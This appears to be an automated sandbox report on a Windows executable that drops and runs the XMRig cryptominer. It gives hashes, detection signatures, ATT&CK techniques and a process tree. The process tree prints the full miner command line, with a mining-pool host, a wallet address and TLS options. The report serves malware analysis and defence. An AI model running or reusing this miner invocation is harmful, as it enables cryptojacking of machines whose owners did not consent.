Resubmissions

06-07-2024 19:03

240706-xqksaazhrm 10

21-06-2024 07:08

240621-hyl8razgpc 10

16-06-2024 18:48

240616-xf5ppswgmq 10

16-06-2024 18:34

240616-w759wasbqf 10

16-06-2024 18:21

240616-wzje5swajj 10

16-06-2024 18:08

240616-wqxams1ekf 10

16-06-2024 17:54

240616-whbzqsvcrn 10

16-06-2024 17:41

240616-v9q3aszhkf 10

16-06-2024 17:28

240616-v1237szgpc 10

Analysis

  • max time kernel
    1791s
  • max time network
    1794s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-06-2024 07:08

General

  • Target

    main - Copy (3) - Copy.exe

  • Size

    6.9MB

  • MD5

    22c978ffaefef3389bf29068b9621661

  • SHA1

    5671972c1d70826fb85dced4c83c700dd282ea21

  • SHA256

    e6ee8e9b38e10a92a89e61b8655ca4fedcc381fd93cb36f43fe323132923dfcf

  • SHA512

    8a280cb782f0afab171d2e7955b75362e98cefd449d382004ef2568c2c230cd633a754b1dd5f0dc5e17407819e4dceb5b0cbb2647e279a6ec674b8d9484be26a

  • SSDEEP

    98304:7b5Ak7khMiyw0VREqfnle5EEPbxVhCQHSIMf:5LUMiywZqshDxaQHh

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 64 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
    "C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2744
    • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
      xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4924

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Subvert Trust Controls

1
T1553

Install Root Certificate

1
T1553.004

Modify Registry

1
T1112

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
    Filesize

    7.9MB

    MD5

    e2fe87cc2c7dab8ca6516620dccd1381

    SHA1

    f714ec0448325435103519452610cf7aadf8bbba

    SHA256

    d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4

    SHA512

    8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

  • memory/4924-16-0x000001E1F6580000-0x000001E1F65A0000-memory.dmp
    Filesize

    128KB

  • memory/4924-17-0x000001E1F65C0000-0x000001E1F65E0000-memory.dmp
    Filesize

    128KB

  • memory/4924-18-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-20-0x000001E288FB0000-0x000001E288FD0000-memory.dmp
    Filesize

    128KB

  • memory/4924-19-0x000001E288F90000-0x000001E288FB0000-memory.dmp
    Filesize

    128KB

  • memory/4924-21-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-22-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-25-0x000001E288FB0000-0x000001E288FD0000-memory.dmp
    Filesize

    128KB

  • memory/4924-24-0x000001E288F90000-0x000001E288FB0000-memory.dmp
    Filesize

    128KB

  • memory/4924-23-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-26-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-27-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-28-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-29-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-30-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-31-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-32-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-33-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-34-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-35-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-36-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-37-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-38-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-39-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-40-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-41-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-42-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-43-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-44-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-45-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-46-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-47-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-48-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-49-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-50-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-51-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-52-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-53-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-54-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-55-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-56-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-57-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-58-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-59-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-60-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-61-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-62-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-63-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-64-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-65-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-66-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-67-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-68-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-69-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-70-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-71-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-72-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-73-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-74-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-75-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-76-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-77-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-78-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-79-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-80-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-81-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-82-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-83-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB

  • memory/4924-84-0x00007FF7238C0000-0x00007FF7243C3000-memory.dmp
    Filesize

    11.0MB